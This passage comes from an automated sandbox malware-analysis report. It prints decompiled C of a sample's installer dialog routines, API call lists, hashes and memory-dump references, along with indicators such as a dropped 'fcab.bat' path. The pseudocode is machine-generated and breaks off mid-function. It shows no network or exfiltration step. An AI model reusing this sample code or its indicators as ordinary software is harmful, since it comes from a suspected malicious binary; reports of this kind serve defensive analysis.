							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a280 = _t306;
					 *0x4236e0 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t252 = LoadBitmapW( *0x42a200, 0x6e);
					 *0x4236d4 =  *0x4236d4 | 0xffffffff;
					_t313 = _t252;
					 *0x4236dc = SetWindowLongW(_v8, 0xfffffffc, E00405224);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236cc = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236cc);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E0040626E(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004041E1(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004041E1(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x4236e0 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x4236e0 + _t316 * 4) = _t276;
									_t284 =  *( *0x4236e0 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a24c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404216(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404216(_v12);
								L91:
								return E00404248(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}




























































                                                          0x00404c3b
                                                          0x00404c4c
                                                          0x00404c51
                                                          0x00404c59
                                                          0x00404c5f
                                                          0x00404c67
                                                          0x00404c75
                                                          0x00404c78
                                                          0x00404e99
                                                          0x00404ea0
                                                          0x00404eb4
                                                          0x00404ea2
                                                          0x00404ea4
                                                          0x00404ea7
                                                          0x00404ea8
                                                          0x00404eaf
                                                          0x00404eaf
                                                          0x00404ec0
                                                          0x00404ece
                                                          0x00404ed1
                                                          0x00404ee7
                                                          0x00404f5c
                                                          0x00404f5f
                                                          0x00404f61
                                                          0x00404f6b
                                                          0x00404f79
                                                          0x00404f79
                                                          0x00404f7b
                                                          0x00404f85
                                                          0x00404f8b
                                                          0x00404f8e
                                                          0x00404f91
                                                          0x00404fac
                                                          0x00404f93
                                                          0x00404f9d
                                                          0x00404f9d
                                                          0x00404f91
                                                          0x00404f85
                                                          0x00000000
                                                          0x00404f5f
                                                          0x00404eec
                                                          0x00404ef7
                                                          0x00404efc
                                                          0x00404f03
                                                          0x00404f08
                                                          0x00404f0c
                                                          0x00404f17
                                                          0x00404f17
                                                          0x00404f1b
                                                          0x00404f1f
                                                          0x00404f23
                                                          0x00404f36
                                                          0x00404f25
                                                          0x00404f25
                                                          0x00404f2c
                                                          0x00404f32
                                                          0x00404f2e
                                                          0x00404f2e
                                                          0x00404f2e
                                                          0x00404f2c
                                                          0x00404f3a
                                                          0x00404f3c
                                                          0x00404f4f
                                                          0x00404f52
                                                          0x00404f55
                                                          0x00404f55
                                                          0x00404f1f
                                                          0x00000000
                                                          0x00404f0c
                                                          0x00404eee
                                                          0x00404ef5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404faf
                                                          0x00404faf
                                                          0x00404fb6
                                                          0x00405027
                                                          0x0040502f
                                                          0x00405037
                                                          0x00405037
                                                          0x00405040
                                                          0x00405042
                                                          0x00405049
                                                          0x0040504c
                                                          0x0040504c
                                                          0x00405052
                                                          0x00405059
                                                          0x0040505c
                                                          0x0040505c
                                                          0x00405062
                                                          0x00405068
                                                          0x0040506e
                                                          0x0040506e
                                                          0x0040507b
                                                          0x004051d1
                                                          0x004051d8
                                                          0x004051f5
                                                          0x004051fb
                                                          0x0040520d
                                                          0x0040520d
                                                          0x00000000
                                                          0x00405081
                                                          0x00405083
                                                          0x00405088
                                                          0x0040508d
                                                          0x00405092
                                                          0x00405094
                                                          0x00405094
                                                          0x00405095
                                                          0x00405096
                                                          0x00405098
                                                          0x00405098
                                                          0x004050a0
                                                          0x004050e1
                                                          0x004050e3
                                                          0x004050f3
                                                          0x004050f6
                                                          0x004050fb
                                                          0x00405102
                                                          0x00405105
                                                          0x004051a7
                                                          0x004051ad
                                                          0x004051bb
                                                          0x004051cc
                                                          0x004051cc
                                                          0x00000000
                                                          0x004051bb
                                                          0x0040510b
                                                          0x0040510e
                                                          0x00405114
                                                          0x00405119
                                                          0x0040511b
                                                          0x0040511d
                                                          0x00405123
                                                          0x0040512a
                                                          0x0040512f
                                                          0x00405136
                                                          0x00405139
                                                          0x00405139
                                                          0x00405140
                                                          0x0040514c
                                                          0x00405150
                                                          0x00405152
                                                          0x00405152
                                                          0x00405142
                                                          0x00405144
                                                          0x00405144
                                                          0x00405172
                                                          0x0040517e
                                                          0x0040518d
                                                          0x0040518d
                                                          0x0040518f
                                                          0x00405192
                                                          0x0040519b
                                                          0x00000000
                                                          0x004050a2
                                                          0x004050ad
                                                          0x004050b0
                                                          0x004050b5
                                                          0x004050b7
                                                          0x004050bb
                                                          0x004050cb
                                                          0x004050d5
                                                          0x004050d7
                                                          0x004050da
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004050bd
                                                          0x004050bd
                                                          0x004050c3
                                                          0x004050c5
                                                          0x004050c5
                                                          0x004050c6
                                                          0x004050c7
                                                          0x00000000
                                                          0x004050bd
                                                          0x004050a0
                                                          0x0040507b
                                                          0x00404fbe
                                                          0x00000000
                                                          0x00404fd4
                                                          0x00404fde
                                                          0x00404fe3
                                                          0x00000000
                                                          0x00000000
                                                          0x00404ff5
                                                          0x00404ffa
                                                          0x00405006
                                                          0x00405006
                                                          0x00405008
                                                          0x00405017
                                                          0x00405019
                                                          0x0040501d
                                                          0x00405020
                                                          0x00000000
                                                          0x00405020
                                                          0x00404fbe
                                                          0x00404c7e
                                                          0x00404c83
                                                          0x00404c8c
                                                          0x00404c93
                                                          0x00404ca1
                                                          0x00404cac
                                                          0x00404cb2
                                                          0x00404cc0
                                                          0x00404cd4
                                                          0x00404cd9
                                                          0x00404ce6
                                                          0x00404ceb
                                                          0x00404d01
                                                          0x00404d12
                                                          0x00404d1f
                                                          0x00404d1f
                                                          0x00404d22
                                                          0x00404d28
                                                          0x00404d2a
                                                          0x00404d2d
                                                          0x00404d32
                                                          0x00404d37
                                                          0x00404d39
                                                          0x00404d39
                                                          0x00404d59
                                                          0x00404d59
                                                          0x00404d5b
                                                          0x00404d5c
                                                          0x00404d61
                                                          0x00404d64
                                                          0x00404d67
                                                          0x00404d6b
                                                          0x00404d70
                                                          0x00404d75
                                                          0x00404d79
                                                          0x00404d7e
                                                          0x00404d83
                                                          0x00404d85
                                                          0x00404d8d
                                                          0x00404e58
                                                          0x00404e6b
                                                          0x00000000
                                                          0x00404d93
                                                          0x00404d96
                                                          0x00404d99
                                                          0x00404d9c
                                                          0x00404d9c
                                                          0x00404da3
                                                          0x00404da9
                                                          0x00404dac
                                                          0x00404db2
                                                          0x00404db3
                                                          0x00404db8
                                                          0x00404dc1
                                                          0x00404dc8
                                                          0x00404dcb
                                                          0x00404dce
                                                          0x00404dd1
                                                          0x00404e0d
                                                          0x00404e36
                                                          0x00404e0f
                                                          0x00404e1c
                                                          0x00404e1c
                                                          0x00404dd3
                                                          0x00404dd6
                                                          0x00404de5
                                                          0x00404def
                                                          0x00404df7
                                                          0x00404dfe
                                                          0x00404e06
                                                          0x00404e06
                                                          0x00404dd1
                                                          0x00404e3c
                                                          0x00404e3d
                                                          0x00404e49
                                                          0x00404e49
                                                          0x00404e56
                                                          0x00404e71
                                                          0x00404e75
                                                          0x00404e92
                                                          0x00404e97
                                                          0x00000000
                                                          0x00404e77
                                                          0x00404e7c
                                                          0x00404e85
                                                          0x0040520f
                                                          0x00405221
                                                          0x00405221
                                                          0x00404e75
                                                          0x00000000
                                                          0x00404e56
                                                          0x00404d8d

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00404C44
                                                          • GetDlgItem.USER32 ref: 00404C4F
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                                          • SetWindowLongW.USER32 ref: 00404CC5
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                          • DeleteObject.GDI32(00000000), ref: 00404D22
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                          • SetWindowLongW.USER32 ref: 00404E6B
                                                          • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                          • GlobalFree.KERNEL32 ref: 0040505C
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                          • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                          • GetDlgItem.USER32 ref: 00405206
                                                          • ShowWindow.USER32(00000000), ref: 0040520D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                                          • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                          • Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                                          • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004046B0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E004046B0(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226c0; // 0x641114
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405892(0x3fb, _t146);
					E004064E0(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405892(0x3fb, _t146);
							if(E00405C25(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040624C(0x4216b8, _t146);
							_t87 = E00406626(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624C(0x4216b8, _t146);
								_t89 = E00405BC8(0x4216b8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216b8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216b8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216b8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B69(0x4216b8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216b8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B4D(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t158) {
									E00404B35(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216a8);
									} else {
										E00404A6C(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404203(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236d8 == _t158) {
									E00404609();
								}
								 *0x4236d8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x4236e8;
							_v60 = E00404A06;
							_v56 = _t146;
							_v68 = E0040626E(_t146, 0x4236e8, _t167, 0x421ec0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B1D(_t146);
								_t125 =  *((intOrPtr*)( *0x42a214 + 0x11c));
								if( *((intOrPtr*)( *0x42a214 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth") {
									E0040626E(_t146, 0x4236e8, _t167, 0, _t125);
									if(lstrcmpiW(0x4281a0, 0x4236e8) != 0) {
										lstrcatW(_t146, 0x4281a0);
									}
								}
								 *0x4236d8 =  *0x4236d8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405B94(_t146) != 0 && E00405BC8(_t146) == 0) {
						E00405B1D(_t146);
					}
					 *0x4291d8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004041E1(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004041E1(_t167);
					E00404216(_t166);
					_t138 = E00406626(7);
					if(_t138 == 0) {
						L53:
						return E00404248(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                          0x004046b0
                                                          0x004046b6
                                                          0x004046bc
                                                          0x004046c9
                                                          0x004046d7
                                                          0x004046da
                                                          0x004046e2
                                                          0x004046e8
                                                          0x004046e8
                                                          0x004046f4
                                                          0x004046f7
                                                          0x00404765
                                                          0x0040476c
                                                          0x00404843
                                                          0x0040484a
                                                          0x00404859
                                                          0x00404859
                                                          0x0040485d
                                                          0x00404867
                                                          0x00404874
                                                          0x00404876
                                                          0x00404876
                                                          0x00404884
                                                          0x0040488b
                                                          0x00404892
                                                          0x00404895
                                                          0x004048d1
                                                          0x004048d3
                                                          0x004048d9
                                                          0x004048de
                                                          0x004048e2
                                                          0x004048e4
                                                          0x004048e4
                                                          0x00404900
                                                          0x00000000
                                                          0x00404902
                                                          0x00404905
                                                          0x00404913
                                                          0x00404919
                                                          0x0040491a
                                                          0x0040491d
                                                          0x00404920
                                                          0x00000000
                                                          0x00404920
                                                          0x00404897
                                                          0x00404899
                                                          0x0040489d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040489f
                                                          0x0040489f
                                                          0x004048ac
                                                          0x004048b1
                                                          0x00000000
                                                          0x00000000
                                                          0x004048b5
                                                          0x004048b7
                                                          0x004048b7
                                                          0x004048c0
                                                          0x004048c2
                                                          0x004048c7
                                                          0x004048ca
                                                          0x004048cf
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004048cf
                                                          0x0040492c
                                                          0x00404936
                                                          0x00404939
                                                          0x0040493c
                                                          0x00404943
                                                          0x00404943
                                                          0x00404945
                                                          0x00404945
                                                          0x0040494a
                                                          0x0040494c
                                                          0x00404954
                                                          0x0040495b
                                                          0x0040495d
                                                          0x00404968
                                                          0x00404968
                                                          0x0040495d
                                                          0x00404978
                                                          0x00404982
                                                          0x0040498a
                                                          0x004049a5
                                                          0x0040498c
                                                          0x00404995
                                                          0x00404995
                                                          0x0040498a
                                                          0x004049aa
                                                          0x004049af
                                                          0x004049b4
                                                          0x004049bd
                                                          0x004049bd
                                                          0x004049c6
                                                          0x004049c8
                                                          0x004049c8
                                                          0x004049d4
                                                          0x004049dc
                                                          0x004049e6
                                                          0x004049e6
                                                          0x004049eb
                                                          0x00000000
                                                          0x004049eb
                                                          0x00404895
                                                          0x0040484c
                                                          0x00404853
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404853
                                                          0x00404772
                                                          0x0040477b
                                                          0x00404795
                                                          0x0040479a
                                                          0x004047a4
                                                          0x004047ab
                                                          0x004047b7
                                                          0x004047ba
                                                          0x004047bd
                                                          0x004047c4
                                                          0x004047cc
                                                          0x004047cf
                                                          0x004047d3
                                                          0x004047da
                                                          0x004047e2
                                                          0x0040483c
                                                          0x004047e4
                                                          0x004047e5
                                                          0x004047ec
                                                          0x004047f6
                                                          0x004047fe
                                                          0x0040480b
                                                          0x0040481f
                                                          0x00404823
                                                          0x00404823
                                                          0x0040481f
                                                          0x00404828
                                                          0x00404835
                                                          0x00404835
                                                          0x004047e2
                                                          0x00000000
                                                          0x0040479a
                                                          0x00404788
                                                          0x00000000
                                                          0x00000000
                                                          0x0040478e
                                                          0x00000000
                                                          0x004046f9
                                                          0x00404706
                                                          0x0040470f
                                                          0x0040471c
                                                          0x0040471c
                                                          0x00404723
                                                          0x00404729
                                                          0x00404732
                                                          0x00404735
                                                          0x00404738
                                                          0x00404740
                                                          0x00404743
                                                          0x00404746
                                                          0x0040474c
                                                          0x00404753
                                                          0x0040475a
                                                          0x004049f1
                                                          0x00404a03
                                                          0x00404760
                                                          0x00404763
                                                          0x00000000
                                                          0x00404763
                                                          0x0040475a

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 004046FF
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                                          • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                                          • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404817
                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404823
                                                          • SetDlgItemTextW.USER32 ref: 00404835
                                                            • Part of subcall function 00405892: GetDlgItemTextW.USER32 ref: 004058A5
                                                            • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\fcab.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                            • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                            • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\fcab.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                            • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\fcab.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                          • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                                            • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                            • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                                            • Part of subcall function 00404A6C: SetDlgItemTextW.USER32 ref: 00404B29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$Call$6B
                                                          • API String ID: 2624150263-3688302569
                                                          • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                          • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                                          • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                          • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
